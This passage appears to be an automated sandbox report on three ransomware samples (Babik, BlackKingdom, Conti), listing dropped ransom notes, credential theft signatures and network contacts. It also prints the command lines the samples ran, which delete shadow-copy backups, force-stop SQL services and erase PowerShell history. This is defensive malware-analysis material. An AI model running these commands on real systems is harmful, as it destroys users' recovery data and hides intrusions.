File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Interacts with shadow copies

ransomware

Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 59.28.101.95.in-addr.arpa udp
US 8.8.8.8:53 208.73.46.23.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Analysis: behavioral9

Detonation Overview

Submitted 2024-07-28 16:38
Reported 2024-07-28 16:42
Platform win7-20240704-en
Max time kernel 150s
Max time network 126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1292 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 860 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 944 wrote to memory of 1784 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 860 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1336 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:80 mega.io tcp
LU 66.203.124.37:443 mega.io tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.15:443 g.api.mega.co.nz tcp
LU 66.203.125.15:443 g.api.mega.co.nz tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI12922\ucrtbase.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-localization-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-processthreads-l1-1-1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-file-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-timezone-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-core-file-l2-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\python37.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-runtime-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-string-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-heap-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-stdio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-math-l1-1-0.dll

\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-convert-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-locale-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-time-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-environment-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-conio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-filesystem-l1-1-0.dll

\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-process-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\pywintypes37.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-utility-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_tkinter.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI12922\tcl86t.dll

C:\Users\Admin\AppData\Local\Temp\_MEI12922\tk86t.dll

memory/2928-1099-0x0000000002B10000-0x0000000002B90000-memory.dmp

memory/2928-1100-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2928-1101-0x0000000002860000-0x0000000002868000-memory.dmp

C:\MSOCache\All Users\decrypt_file.TxT

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

146s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (7396) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\CHICAGO.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\ExcelCapabilities.json C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\framework-dev.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_retina.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations_retina.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Common Files\System\ado\en-US\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ka\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\sm\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Resources\1033\msmdsrvi_xl.rll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
